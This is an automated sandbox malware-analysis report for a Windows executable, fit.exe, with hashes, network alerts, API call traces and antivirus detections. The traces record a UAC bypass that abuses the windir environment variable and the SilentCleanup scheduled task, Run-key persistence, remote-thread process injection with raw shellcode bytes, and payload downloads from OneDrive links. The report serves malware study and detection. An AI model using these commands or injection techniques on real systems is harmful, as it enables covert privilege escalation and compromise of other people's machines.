Summary | ZeroBOX

fit.exe

Malicious Library Downloader FTP Code injection DGA HTTP Escalate priviledges Create Service KeyLogger P2P Internet API Sniff Audio DNS Http API Steal credential ScreenShot Socket PE File PE32 AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6402 Sept. 4, 2021, 1:53 p.m. Sept. 4, 2021, 1:56 p.m.
Size 731.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 3386ae032f6d373ca53c4cdd9f2d8071
SHA256 e8fd9fa558e765a0a6273a0ba98195347c8c388491e4e6186fccf4d8a69baf84
CRC32 681C661C
ssdeep 12288:KAQ4TXPbFLYhC0MPsgGsXxItImX/m/zOOMH9L9T5kLvRJ:KZaZUhJOskXOt/vmb6kLJ
Yara
  • PE_Header_Zero - PE File Signature
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49165 -> 13.107.42.12:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49164 -> 13.107.42.13:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49166 -> 13.107.42.12:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49164
13.107.42.13:443
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 CN=onedrive.com 50:2f:33:10:92:ac:27:7b:17:be:82:68:3b:e2:29:ad:97:41:b7:bb
TLSv1
192.168.56.102:49165
13.107.42.12:443
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e
TLSv1
192.168.56.102:49166
13.107.42.12:443
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /min C:\Users\Public\UKO.bat
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: reg
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: delete hkcu\Environment /v windir /f
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: reg
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: schtasks
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: exit
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The system was unable to find the specified registry key or value.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The system cannot find the path specified.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /min reg delete hkcu\Environment /v windir /f
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0
section CODE
section DATA
section BSS
packer BobSoft Mini Delphi -> BoB / BobSoft
request GET https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21145&authkey=AFt5mXo5_hIU9Wo
request GET https://ya5qxq.sn.files.1drv.com/y4mWV0lrv_tiHoBpZFLgeGeAoOLHwgJmNqdH0OgjUFuy2BNr8G1IO_HRyR6jrXDrImiFe2QUvT74VBUi5sedcd9fLF9dxoWww6_21cF9mI_hsgFoBYR5C-53tzBarzEgUjh_sHrNCdGK_piD2dAN0Pt76qJhizWP4egLLhy7FriuiAueVsovba7AN1mG-Ds_Hqv63TZr0t6kELXRIsqvIrriA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1
request GET https://ya5qxq.sn.files.1drv.com/y4mhkdES2FrzkTr6_ft2vmvKfb9bGMafvF6erpDGpYTyyTou4wOYM--o-pDpWFRoe7XtvHGmX-j_fZ9jW-sMy0xF9LNy6xYLxCqh457rSVvRZ9mXnrhAbWBC7JoY6cVQXsaxJXaqxeEx9ypdygh-0x4PHsyE4Rqwgt5FVSoogr_d7kT53WzOlK4QTYdvaXtyMutkLvh5570BfFK65a9VkcfOA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e52000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 560
region_size: 507904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10590000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 495616
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10591000
process_handle: 0xffffffff
1 0 0
file C:\Users\Public\KDECO.bat
file C:\Users\Public\UKO.bat
file C:\Users\Public\Libraries\Zmtabit\Zmtabit.exe
file C:\Users\Public\Trast.bat
file C:\Users\Public\nest.bat
cmdline C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 81920
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00631000
process_handle: 0xffffffff
1 0 0
section {u'size_of_data': u'0x00036000', u'virtual_address': u'0x00086000', u'entropy': 7.327482100356089, u'name': u'.rsrc', u'virtual_size': u'0x00036000'} entropy 7.32748210036 description A section with a high entropy has been found
entropy 0.29568788501 description Overall entropy of this PE file is high
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline reg delete hkcu\Environment /v windir /f
cmdline reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
buffer Buffer with sha1: 1216e33d89cdcb279ce6729e16649aa0247cc847
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 507904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10590000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00110000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00120000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00130000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00210000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00220000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00230000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00240000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00250000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Zmtabit reg_value C:\Users\Public\Libraries\tibatmZ.url
Process injection Process 560 created a remote thread in non-child process 1644
Time & API Arguments Status Return Repeated

CreateRemoteThread

thread_identifier: 2816
process_identifier: 1644
function_address: 0x000f0000
flags: 0
stack_size: 0
parameter: 0x00000000
process_handle: 0x00000540
1 1352 0

CreateRemoteThread

thread_identifier: 2208
process_identifier: 1644
function_address: 0x00130000
flags: 0
stack_size: 0
parameter: 0x00120000
process_handle: 0x00000540
1 1352 0

CreateRemoteThread

thread_identifier: 2828
process_identifier: 1644
function_address: 0x00230000
flags: 0
stack_size: 0
parameter: 0x00220000
process_handle: 0x00000540
1 1348 0

CreateRemoteThread

thread_identifier: 2860
process_identifier: 1644
function_address: 0x00250000
flags: 0
stack_size: 0
parameter: 0x00240000
process_handle: 0x00000540
1 1360 0
Process injection Process 560 manipulating memory of non-child process 1644
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 507904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10590000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00110000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00120000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00130000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00210000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00220000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00230000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00240000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

process_identifier: 1644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00250000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000540
1 0 0
Process injection Process 560 injected into non-child 1644
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: hÿhÿ×I¤v˜Õ³wkernel32.dllÿ<û:\ú:¾ttŒú:™Ét ý~pú:latQytû ý~Œú::‰t6;£t û:m؞täú:äú:ÿÿÿÿPû:<û:B?¤ÿ$¤,û:,%¤ôú:0v.€4v.,û:¹E¥ÁE¥`û:F¤
base_address: 0x000f0000
process_identifier: 1644
process_handle: 0x00000540
1 1 0

WriteProcessMemory

buffer: GetProcAddress
base_address: 0x00100000
process_identifier: 1644
process_handle: 0x00000540
1 1 0

WriteProcessMemory

buffer: kernel32.dll
base_address: 0x00110000
process_identifier: 1644
process_handle: 0x00000540
1 1 0

WriteProcessMemory

buffer: ˜Õ³w"¤vE¤v
base_address: 0x00120000
process_identifier: 1644
process_handle: 0x00000540
1 1 0

WriteProcessMemory

buffer: U‹ìƒÄìVW‹E‹ð}쥥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^‹å]‹ÀU‹ìƒÄàSVW‹ù‰Uü‹Ø‹u3À‰Eøh,N¥h@N¥èÿÿPèÿÿ‰EèhPN¥h@N¥èéÿÿPèëÿÿ‰Eäh`N¥h@N¥èÑÿÿPèÓÿÿ‰Eàƒþu‰}ðë‹Î‹×‹ÃèGüÿÿ‰Eð‹Uü‹Ãè¢ûÿÿ‰EìjjMàº8M¥‹Ãè`üÿÿ‹Ø…ÛtjÿSèRÿÿEôPSè@ÿÿ‹Eô‰Eø‹Eø_^[‹å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadU‹ìƒÄìS‰Eü‹Eü‰Eø‹E‹@ü‹€¤‰EôëU‹Eø‹@ƒèÑè‰Eì‹EøƒÀ‰Eð‹UìJ…Òr0B‹Eðf‹öÅðt‹E‹@ô‹]øfáÿ·ÉÁ‹M‹IøƒEðJuыEð‰Eø‹Eø+Eü;Eôr [‹å]Ã
base_address: 0x00130000
process_identifier: 1644
process_handle: 0x00000540
1 1 0

WriteProcessMemory

buffer: LoadLibraryA
base_address: 0x00200000
process_identifier: 1644
process_handle: 0x00000540
1 1 0

WriteProcessMemory

buffer: kernel32.dll
base_address: 0x00210000
process_identifier: 1644
process_handle: 0x00000540
1 1 0

WriteProcessMemory

buffer: ˜Õ³w"¤vE¤v!
base_address: 0x00220000
process_identifier: 1644
process_handle: 0x00000540
1 1 0

WriteProcessMemory

buffer: U‹ìƒÄìVW‹E‹ð}쥥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^‹å]‹ÀU‹ìƒÄàSVW‹ù‰Uü‹Ø‹u3À‰Eøh,N¥h@N¥èÿÿPèÿÿ‰EèhPN¥h@N¥èéÿÿPèëÿÿ‰Eäh`N¥h@N¥èÑÿÿPèÓÿÿ‰Eàƒþu‰}ðë‹Î‹×‹ÃèGüÿÿ‰Eð‹Uü‹Ãè¢ûÿÿ‰EìjjMàº8M¥‹Ãè`üÿÿ‹Ø…ÛtjÿSèRÿÿEôPSè@ÿÿ‹Eô‰Eø‹Eø_^[‹å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadU‹ìƒÄìS‰Eü‹Eü‰Eø‹E‹@ü‹€¤‰EôëU‹Eø‹@ƒèÑè‰Eì‹EøƒÀ‰Eð‹UìJ…Òr0B‹Eðf‹öÅðt‹E‹@ô‹]øfáÿ·ÉÁ‹M‹IøƒEðJuыEð‰Eø‹Eø+Eü;Eôr [‹å]Ã
base_address: 0x00230000
process_identifier: 1644
process_handle: 0x00000540
1 1 0

WriteProcessMemory

buffer: YýY
base_address: 0x00240000
process_identifier: 1644
process_handle: 0x00000540
1 1 0

WriteProcessMemory

buffer: U‹ìƒÄø‹E‹‰Uø‹P‰Uü1ÀPjÿuøÿUüYY]@U‹ìƒÄÔSVW‹ú‹ðEԋ\D¥èñÿÿ3ÀUh%M¥dÿ0d‰ ÆEÿ‹G<ljEô»Ãj@h0‹Eô‹@PP‹Eô‹@4ÃPèÄÿÿ‰Eðƒ}ðt0h€j‹EðPè»ÿÿj@h0‹Eô‹@PP‹Eô‹@4ÃPVè–ÿÿ‰Eðƒ}ðuû0v—EÔP‹Ï‹Uð‹Æ蝋EԅÀt7‰Eè‹Uà‰UìUøR‹UØRP‹EðPVè‚ÿÿjjMèºðK¥‹Æè_ýÿÿ…ÀtÆEÿ3ÀZYYd‰h,M¥Eԋ\D¥èÄÿÿÃ
base_address: 0x00250000
process_identifier: 1644
process_handle: 0x00000540
1 1 0
process fit.exe useragent zipo
process fit.exe useragent aswe
Process injection Process 972 resumed a thread in remote process 808
Process injection Process 2980 resumed a thread in remote process 2556
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 808
1 0 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2556
1 0 0
cmdline C:\Windows\System32\mobsync.exe
Bkav W32.AIDetect.malware2
Elastic malicious (high confidence)
FireEye Generic.mg.3386ae032f6d373c
McAfee RDN/Generic.grp
BitDefenderTheta Gen:NN.ZelphiF.34126.TGW@aKd5o7ji
ESET-NOD32 a variant of Win32/Injector.EPZM
APEX Malicious
Paloalto generic.ml
Kaspersky UDS:DangerousObject.Multi.Generic
Rising Trojan.Generic@ML.95 (RDML:O/aTsu0Y/2Mz4Z7CIDZ/gQ)
McAfee-GW-Edition BehavesLike.Win32.Fareit.bc
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_97%
Kingsoft Win32.Troj.Generic_a.a.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Cynet Malicious (score: 100)
VBA32 BScope.TrojanSpy.Noon
Ikarus Trojan.Inject
MaxSecure Trojan.Malware.300983.susgen
Webroot W32.Malware.Gen
CrowdStrike win/malicious_confidence_60% (W)
dead_host 62.102.148.152:8618